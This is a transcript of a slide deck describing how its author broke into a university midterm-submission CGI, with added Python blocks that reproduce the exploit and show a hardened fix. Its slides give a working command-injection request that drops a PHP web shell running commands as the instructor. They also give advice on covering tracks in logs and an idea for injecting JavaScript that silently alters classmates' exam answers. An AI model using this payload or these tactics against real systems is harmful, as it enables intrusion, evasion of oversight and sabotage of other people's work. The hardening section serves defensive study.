for profit grades and fun (rev 2) mike gerschefske

Post on 22-Dec-2015

215 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: For Profit Grades and Fun (Rev 2) Mike Gerschefske
Page 2

About Me

UCCS – B.S. Computer Engineering ’05
UCCS – M.E.I.A ever since
Just need to finish project :(

iCTF (International Cyber War Games): going on 4th year with UCCS

The MITRE Corporation
Beautiful Girlfriend Kelly
Interests in RE, etc.

Page 3

Intro

Actually hacked the review; assume the actual test works just like the review

No source code; locked down

Already have read access to most things (shell access): other people’s midterms, etc., misc. auth files

Do we even need to hack it? Maybe … What’s our goal?

http://cs.uccs.edu/~cs502/CS502M2008midterm.html

Page 4

How does the midterm work?

Fill out the form and press Submit: username, password, answers

The form checks credentials, saves the midterm to disk, and emails the midterm to Dr. Chow and the user

Page 5

The Midterm

Page 6

On Submit

Echoes out everything submitted, and at the bottom of the screen…

name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txt
login incorrect!

Page 7

What we do know

Form is .cgi, probably Perl

Form checks authentication in the file CS502S2008Grade.txt:
/users/server/faculty/chow/public_html/cgi-bin/grade/CS502S2008Grade.txt
(It said so, in fewer words, on the web page)

Assumptions: potentially greps the username file for valid credentials; probably uses Perl’s open command

Page 8

What we do know (cont.)

Exams are saved here: .../public_html/cgi-bin/grade/CS502/CS502M2008midterm/

Exams are saved in the format: exam_username_108_7_date

Page 9

First Thought

Probably doesn’t check input values read from CS502S2008Grade.txt. Why would you? It’s trusted.

Exploit the trusted: if we could change a username in there, we might be able to exploit the unchecked variables

If a file name built from those unchecked names is handed to a shell command, we could execute arbitrary system commands

Page 10

Finding out more

Just hitting Submit (empty exam) posts the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

Why does it send CS502M2008midterm? Probably written to be generic

Returns:
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txt
login incorrect!

Page 11

Modifying Requests

Empty exam, omitting CS502M2008midterm. The original request:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

Send an empty exam parameter instead: exam=&name=&login=…

Returns:
name=exam, value=
class=, year=, semester= term=
open filename=Grade.txt
login incorrect!

Page 12

Modifying Requests (cont.)

Send the following (fuzzing):
exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

Returns:
name=exam, value=abcdefghicjklmnopqrstuvwxyz
class=abcde, year=ghic, semester=fghic term=jklmnopqrstuvwxyz
open filename=abcdefghicGrade.txt
login incorrect!

Assumptions: the first 10 characters of exam are prefixed to Grade.txt to name the authentication file. 10 characters is not a lot to work with. Probably does a substring of exam[1..10]; the rest becomes term, with no visible length limit.

Page 13

*Grade.txt

First thought: try to change the location of Grade.txt. If we control it, we potentially control unchecked input.

Assumptions: probably issues something like open(“~chow/…/” + $10char + “Grade.txt”). The leading file path would prevent us from using /tmp (we can’t get it to open /tmp/abcGrade.txt).

This may be an avenue, but I found another solution so stopped pursuing it.

Page 14

Split Exam Input Value into Two Parameters

The exam value appears somewhere else:
.../public_html/cgi-bin/grade/CS502/CS502M2008midterm/*exams

First 10 characters, CS502M2008, prefixed to Grade.txt: CS502M2008Grade.txt

The whole value, CS502M2008midterm, names the directory the exams are saved in. Why do we upload the entire string CS502M2008midterm???
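The split the fuzzing reveals, as an added Python model that is not part of the slides: the slice boundaries below are inferred from the echo on slides 10–12 and the directory observation on slides 14–15. The Perl source was never seen, so the boundaries, and the "<class>/<exam>" directory layout, are assumptions. It is useful for answering the question the attack hinges on: which parts of `exam` can be changed while the authentication file stays the same.

```python
# Added example, not code from the slides: a model of how the CGI appears to
# carve up the `exam` parameter, reconstructed from the echo on slides 10-12
# and the directory observation on slides 14-15. The slice boundaries are an
# assumption inferred from that output; the Perl source was never seen.

FUZZ = "abcdefghicjklmnopqrstuvwxyz"          # the slide's fuzz string, verbatim
PAYLOAD_TAIL = '& echo "<?php exec(\\$_GET[\'command\']); ?>" > a.php &'


def split_exam(exam: str) -> dict:
    """Reproduce the fields the server echoes back for a given `exam` value."""
    prefix = exam[:10]                 # only these 10 characters reach the auth file name
    return {
        "class": exam[0:5],            # "CS502"
        "semester": exam[5:10],        # "M2008"
        "year": exam[6:10],            # "2008"  (semester minus its leading letter)
        "term": exam[10:],             # "midterm"; no length limit was observed
        "grade_file": prefix + "Grade.txt",
        # Assumption from slide 15: the exam directory takes the *whole* value,
        # not just the term, under a per-class directory.
        "exam_dir": f"{exam[0:5]}/{exam}",
    }


def keeps_auth(candidate: str, original: str = "CS502M2008midterm") -> bool:
    """True when `candidate` still authenticates against the same *Grade.txt,
    i.e. its first 10 characters are untouched (the constraint on slide 15)."""
    return split_exam(candidate)["grade_file"] == split_exam(original)["grade_file"]


if __name__ == "__main__":
    for value in ("", "CS502M2008midterm", FUZZ, "CS502M2008" + PAYLOAD_TAIL):
        f = split_exam(value)
        print(f"exam={value!r}: open filename={f['grade_file']} "
              f"term={f['term']!r} dir={f['exam_dir']!r}")
```

Running it on the empty value, the real value and the fuzz string reproduces the three echoes on slides 10–12; running it on the injected value shows that the auth file is still CS502M2008Grade.txt while the whole shell fragment lands in `term` and, with it, in the directory name.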

Page 15

CS502M2008midterm

Since CS502M2008 is used for authentication, we should leave it alone

Let’s modify midterm and see what it does: change exam=CS502M2008midterm to exam=CS502M2008blah

Unauthenticated, it creates a directory:
.../public_html/cgi-bin/grade/CS502/CS502M2008blah

Authenticated, it creates the directory CS502M2008blah, writes out the exam, and then emails it. Don’t think I actually ever did this authenticated.

Page 16

If Authenticated

If the folder for this midterm doesn’t exist, create it

Upload the exam to the folder

Email out a copy to Dr. Chow and me

Assumptions: the code maybe calls mkdir, or uses Perl to create the directory; probably uses Perl to write out the file; probably not writing socket code to do an SMTP call itself

Page 17

Email Out

How does this work?

Page 18

Email Out

Probably something like this:
exec( mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )

Probably doesn’t check $dir_to_exam. Why would a directory name contain malicious content?

Can’t change $exam ($exam ~= $user_name), and we can’t change $user_name without modifying *Grade.txt

But we can modify $dir_to_exam!!!! Our fuzzing even showed it could be any length

Page 19

Authenticated vs. Unauthenticated

Regardless of authentication, a directory is created. Creating directories doesn’t do very much for us.

Only if authenticated will it run the mail program command

Page 20

Execute My Command

Modify the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assumptions=

To:
exam=CS502M2008COMMAND&login=_LOGIN_&passwd=_PASSWD_

Note: if we don’t log in correctly, the mail program won’t get executed. By keeping CS502M2008, the system will use CS502M2008Grade.txt to authenticate us. We (I) have (had) a username in this file.

Page 21

New Request

Need help encoding URLs: http://www.w3schools.com/TAGS/ref_urlencode.asp

Let’s upload the following command:
& echo "<?php exec(\$_GET['command']); ?>" > a.php &

URL-encoded:
%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26

Full request:
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333
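The encoding step, as an added example that is not part of the slides: it reproduces the w3schools step with Python's standard library and checks that the slide's encoded string really decodes to the intended shell fragment. The login and password used in the body are constructed placeholders, not the values from the slide.

```python
from urllib.parse import parse_qs, quote_plus, unquote_plus, urlencode

# Added example, not from the slides: the URL-encoding step done with the
# standard library. Login/password below are constructed placeholders.

PAYLOAD = '& echo "<?php exec(\\$_GET[\'command\']); ?>" > a.php &'
# The encoded form exactly as it appears on slide 21.
SLIDE_ENCODED = ("%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27"
                 "%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26")


def decode(encoded: str) -> str:
    """application/x-www-form-urlencoded decoding: '+' is a space, %XX a byte."""
    return unquote_plus(encoded)


def encode(raw: str) -> str:
    """Encode the way a browser (or urlencode()) would. Unlike the slide's
    encoder it leaves '_' and '.' unescaped; both forms decode identically."""
    return quote_plus(raw)


def build_body(auth_prefix: str, tail: str, login: str, passwd: str) -> str:
    """POST body: the 10-character auth prefix plus the injected tail in `exam`,
    and the credentials the mail step requires (slide 20). The empty answer
    fields of the original form are not needed."""
    return urlencode({"exam": auth_prefix + tail, "login": login, "passwd": passwd})


def parse_body(body: str) -> dict:
    """What the CGI sees after its own decoding (single-valued fields)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


if __name__ == "__main__":
    print(decode(SLIDE_ENCODED))
    print(build_body("CS502M2008", PAYLOAD, "student", "password"))
```

The point of the `%26` and `%5C` escapes: a raw `&` would end the `exam` field at the first byte of the payload, and the backslash is what keeps the shell from expanding `$_GET` when the echo finally runs, so both have to survive the round trip intact.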

Page 22

Last Request

exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FGET%5B%27command%27%5D%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&passwd=111-22-3333

Creates a directory called:
CS502M2008& echo "<?php exec(\$_GET['command']); ?>" > a.php &

Page 23

Mail Program

Assumption:
exec( mail -s exam [email protected] [email protected] < $dir_to_exam/$exam )

Is now turned into:
exec( mail -s exam [email protected] [email protected] < CS502M2008& echo "<?php exec(\$_GET['command']); ?>" > a.php &/$exam )

The first & ends the mail command (its input redirect from CS502M2008 fails, since that file doesn’t exist, so mail never runs); the echo that follows is a separate command and writes a.php into the CGI’s working directory.

Successfully creates …/grade/a.php, which takes commands and runs them as Dr. Chow
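The injection and its fix side by side, as an added example that is not the CGI's code (the slides never show the Perl source). The command template is the slide's own guess from slide 18 written as a Python format string and run through /bin/sh in a scratch directory; the mail addresses, the exam file name and the "<class>/<exam>" directory layout are constructed placeholders and assumptions. The vulnerable path really executes the shell fragment (nothing is mailed, because the `<` redirect target does not exist and mail never starts); the hardened path whitelists the value and passes arguments as an argv list, never through a shell.

```python
import os
import re
import shutil
import subprocess
import tempfile
import time

# Added example, not the CGI's code. MAIL_TEMPLATE is slide 18's guess at the
# exec() call; TO/CC, EXAM_FILE and the "<class>/<exam>" directory layout are
# constructed placeholders / assumptions (slides 8, 14, 15).
MAIL_TEMPLATE = "mail -s exam {to} {cc} < {dir_to_exam}/{exam_file}"
TO, CC = "instructor@example.invalid", "student@example.invalid"
EXAM_FILE = "exam_mgersch2_108_7_date"          # slide 8 format, placeholder date
BENIGN_EXAM = "CS502M2008midterm"
# The directory name the injected request creates (slide 22), verbatim.
INJECTED_EXAM = 'CS502M2008& echo "<?php exec(\\$_GET[\'command\']); ?>" > a.php &'
DROPPED = "<?php exec($_GET['command']); ?>"   # \$ becomes $ inside double quotes


def vulnerable_command(exam: str, exam_file: str = EXAM_FILE) -> str:
    """The string a shell-interpolating exec()/system() hands to /bin/sh."""
    dir_to_exam = f"{exam[:5]}/{exam}"
    return MAIL_TEMPLATE.format(to=TO, cc=CC, dir_to_exam=dir_to_exam, exam_file=exam_file)


def run_vulnerable(exam: str, timeout: float = 3.0):
    """Run the interpolated command through /bin/sh in a scratch directory and
    return the content of a.php if the injection dropped it there, else None.
    With INJECTED_EXAM the shell sees three commands: `mail ... < CS502/CS502M2008`
    (backgrounded by the first &; the redirect fails, so mail never executes),
    `echo "..." > a.php` (backgrounded by the second &) and `/exam_...` (not found).
    The relative a.php lands in the cwd, which for the real CGI was grade/."""
    workdir = tempfile.mkdtemp(prefix="cgi-cwd-")
    subprocess.run(vulnerable_command(exam), shell=True, cwd=workdir,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    dropped = os.path.join(workdir, "a.php")
    content = None
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:           # the echo runs in the background
        if os.path.exists(dropped) and os.path.getsize(dropped) > 0:
            with open(dropped) as fh:
                content = fh.read().strip()
            break
        time.sleep(0.02)
    shutil.rmtree(workdir, ignore_errors=True)
    return content


# --- hardened form: validate, then never touch a shell -----------------------
SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")   # assumption: a sane name alphabet


def hardened_argv(base_dir: str, exam: str, exam_file: str = EXAM_FILE):
    """Reject anything outside the whitelist, confine the path to base_dir and
    return (argv, path). Run it as subprocess.run(argv, stdin=open(path, 'rb'))
    so the file is fed on stdin by the caller rather than by a shell `< path`."""
    if not (SAFE_NAME.fullmatch(exam) and SAFE_NAME.fullmatch(exam_file)):
        raise ValueError("exam/file name outside whitelist")
    path = os.path.realpath(os.path.join(base_dir, exam[:5], exam, exam_file))
    if not path.startswith(os.path.realpath(base_dir) + os.sep):
        raise ValueError("path escapes base directory")
    return ["mail", "-s", "exam", TO, CC], path


def accepts(exam: str, base_dir: str = "/tmp/grade") -> bool:
    """Does the hardened builder accept this exam value?"""
    try:
        hardened_argv(base_dir, exam)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(vulnerable_command(INJECTED_EXAM))
    print("dropped:", run_vulnerable(INJECTED_EXAM))
    print("hardened accepts payload:", accepts(INJECTED_EXAM))
```

The whitelist is the part that matters: escaping `&`, `>` and quotes for the shell is fragile, whereas rejecting anything but `[A-Za-z0-9_]` and handing `mail` an argv list leaves no shell to inject into. The realpath check is defence in depth against a `..` in a future, looser whitelist.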

Page 24

Conclusions

Consequently, this hack appears never to send out an email, so Dr. Chow is never notified that it was hacked. Or does it? It doesn’t, verified.

Access logs usually record only the request line (and so GET query strings), not POST bodies. Clean up the directories we’ve created and we’ve covered our tracks.

Using a.php to send commands uses GETs, so everything is probably logged there. Can easily change this to POSTs.

Probably a wise idea to secure anything that remotely looks like a production system.

Page 25

Backups

Page 26

Evil Things to Do

The average test may take ~30+ minutes

Inject JS that every 5–10 minutes picks a multiple-choice question and changes the answer. Slow enough that people may not notice the change. If the user prints out a copy, the hard copy will be wrong too.

Goal: lower everyone else’s test scores by some reasonable amount to put yourself at the top of the curve

Page 27

IDS

An IDS probably could not have stopped this, at least not initially

This is a security test, therefore answers that would normally be acceptable an IDS might throw away, i.e. “how would you hack this site”